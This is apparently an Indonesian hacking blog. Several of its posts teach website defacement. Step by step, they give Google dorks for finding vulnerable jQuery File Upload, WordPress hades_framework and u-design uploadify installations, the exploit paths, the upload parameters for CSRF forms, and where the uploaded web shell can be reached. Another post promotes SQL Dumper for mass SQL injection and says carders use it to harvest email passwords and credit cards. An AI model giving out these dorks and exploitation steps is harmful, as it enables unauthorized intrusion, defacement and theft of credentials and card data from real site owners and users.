Jumat, 20 Januari 2017

Cara Deface Dengan Method jQuery File Upload Vulnerability

Vuln


HumarTutor - Cara Deface Dengan Method jQuery File Upload Vulnerability

Mungkin jQuery File Upload adalah cara mudah buat deface, dengan upload saja seh.

Yang susah ya dork nya, kudu pinter pinter kalo pengen buat nemu yang vuln

Syarat :

1. Dork :
inurl:/assets/global/plugins/jquery-file-upload/
inurl:/
jquery-file-upload/

2. Exploit
/server/php/index.php

contoh
site.com/assets/global/plugins/jquery-file-upload/server/php/index.php

3. CSRF
untuk CSRF pake yang online aja biar gampang

Post file? files[]

Langkah :

1. Dorking dulu





2. Nemu? exploit dulu
Blank?? skip

Vuln? setidaknya ada tulisan kayak gambar dibawah

Vuln
foto : ken7ester

3. Pake CSRF Online
Post file? files[]


Online

4. Shell Access ??

site.com/assets/global/plugins/jquery-file-upload/server/php/files/shell.php

Title :

Cara Deface Dengan Method jQuery File Upload Vulnerability

Reviewed by

Humar

On

15.37.00

Rating :

5

Cara Deface Wordpress Add Admin Vulnerability Method

Press

HumarTutor - Cara Deface Wordpress Add Admin Method (SIMPLE)

Setelah lama ga post, sekarang admin mau post cara deface Wordpress Add Admin, cara ini cukup simple karena dengan exploit + register saja kalian udah bisa jadi admin kwkw.

Terserah mau diapain kalo udah jadi admin yakan....

Mungkin cara ini udah lama ya, gpp de. Yang penting mah kalo Deface method ini ya dork nya yang harus mantep.

Syarat :

1. Shell kalian atau Download di 

2. Dork :
inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/

3. CSRF
HTML

4. Exploit :
/hades_framework/option_panel/ajax.php

Contoh :
http://site.com/wp-content/themes/dagda/hades_framework/option_panel/ajax.php

Langkah :

1. Biasa lah, dorking dulu 

2. Exploit pake exploit diatas

Vuln??

Blank kawan selain?? skip 

3. Pake CSRF nya
kalo w pake CSRF versi online buatan mimin sendiri, gampang sih buatnya kalo mau buat sendiri

CSRF
Add Admin CSRF Online

Seperti diatas tampilannya.

Caranya gampang 
- Masukkin site nya, trus LOCK
- Masukkin email mu, trus SUBMIT

Kalo versi HTML ya anu sendiri

Sukses??

ada tulisan Sukses, Ga ada tulisan?? skip

4. Register di Web Target
Caranya??
wp-login?action=register

Contoh??
site.com/wp-login.php?action=register

5. Cek email kalian 

6. Verifikasi

7. Login

Done, dah jadi admin

EZZ kan??



Title :

Cara Deface Wordpress Add Admin Vulnerability Method

Reviewed by

Humar

On

15.04.00

Rating :

5

Kamis, 19 Januari 2017

Web Hiburan Meme 4tawa.co Di Retas???


HumarTutor - Web Hiburan Meme 4tawa.co Di Retas??? 

4tawa.co merupakan situs hiburan meme dan juga terdapat video - video lucu.
Website 4tawa.co ini mempunyai 400k lebih followers di fanspagenya.

Menurut Zone-h.org 4tawa.co diretas  pada tanggal 13-01-2017. Dan diretas oleh KONSLET hal itu jelas dia memampangkan namanya di halaman 4tawa.co yang bertulis HACKED BY KONSLET.

Selain itu di laman 4tawa.co pada saat peretasan juga tertulis "ubuntu 13.10? apache? lol wkwkwkw. gak bisa hardening server mz?" 

Dibawah itu juga terdapat nick nick yang diduga teman teman pelaku.

Juga dibagian footer laman tertulis Indonesia Hacker Rulez  dan email pelaku yakni anas_ramadani@yahoo.it

Dikutip dari 3xploi7 bug POC nya adalah

Lavarel ninja media Script

Sampai sekarang website 4tawa.co bertuliskan
"Mohon Maaf, Untuk sementara web 4tawa.co sedang diperbaiki

Minta doanya dari seluruh member agar perbaikan ini tidak memakan waktu yang lama

Terima Kasih, :)"

Referensi ; 3xpoi7 bug

Title :

Web Hiburan Meme 4tawa.co Di Retas???

Reviewed by

Humar

On

20.33.00

Rating :

5

Selasa, 27 Desember 2016

Cara Deface Wordpress Themes u-design

Cara Deface Wordpress Themes u-design


WordPress

HumarTutor - Cara Deface Wordpress Themes u-design

Kali ini admin akan beri tau cara deface u-design, mungkin cara ini udah lama. Ya kalian hanya perlu ngembangin dork biar dapet banyak yang vuln vuln.

Oke simak baik baik

Bahan bahan :

1. Dork inurl:/wp-content/themes/u-design/ kembangin lagi
inurl:/wp-content/themes/u-design/ site:id, site:apalah

2. Exploit : /scripts/admin/uploadify/uploadify.php
jadi site/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php atau
site/path/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php

3. CSRF , pake csrf online ja DISINI

Baca Juga

Langkah :

1. Dorking dulu

2. Kalo udah nemu exploit /scripts/admin/uploadify/uploadify.php,
Vuln? blank biasanya

3. Kalian masuk ke CSRF Online DISINI trus Post File nya Filedata



Uploadify
foto: GarudaSecHacker

4. Kalo seperti diatas, muncul angka 1. Maka sukses

5. Akses shell?

site.com/shell.php
site.com/path/shell.php


Title :

Cara Deface Wordpress Themes u-design

Reviewed by

Humar

On

13.17.00

Rating :

5

Download SQL Dumper V 7.0 Full Version

Download SQL Dumper v.7.0 Full Version


Dumper
SQL Dumper

HumarTutor - Download SQL Dumper v.7.0 Pro Full Version


Apa itu SQL Dumper?

SQL Dumper adalah Sebuah tools yang memudahkan untuk injeksi pada web target secara otomatis, kita hanya perlu memasukkan dork kedalam kolom yang terdapat di sana.

Ada yang belum kenal SQL Dumper? atau masih asing ditelinga kalian?

Ya, Sql Dumper mungkin masih asing jika kalian baru saja terjun ke dunia Underground ini.

SQL Dumper hampir sama dengan Havij, perbedaan hanya function injeksinya, karena havij menerima web dengan 1 per 1, tetapi SQL Dumper dilengkapi dengan search otomatis, dan mass injection.

SQL Dumper biasannya digunakan para Carder untuk cari empas (Email Password) maupun CC, karena tools ini penggunaannya sangat mudah sekali, hanya memasukkan dork kalian yang paling jos, udah dapet ribuan empas deh.

SQL Dumper ini sudah dilengkapi Pencarian otomatis, berbeda dengan havij yang tidak ada pencarian otomatis, tetapi kita perlu menginput manual web nya.

SQL Dumper sangat disarankan penggunaannya melalui RDP, karena jika kalian make kuota maka akan cepat habis kwkwkw,
jika kalian make di warnet kalian bakal digebukkin satu warnet, karena bikin lemot inet nya wkwkkw

Tidak hanya para carder yang menggunakan, defacer juga bisa, biasanya mereka cari user pass admin bukan cc atau apalah.


Dumper
foto: xmedia

Begitulah tampilannya

Langsung aja Download :

Title :

Download SQL Dumper V 7.0 Full Version

Reviewed by

Humar

On

12.23.00

Rating :

5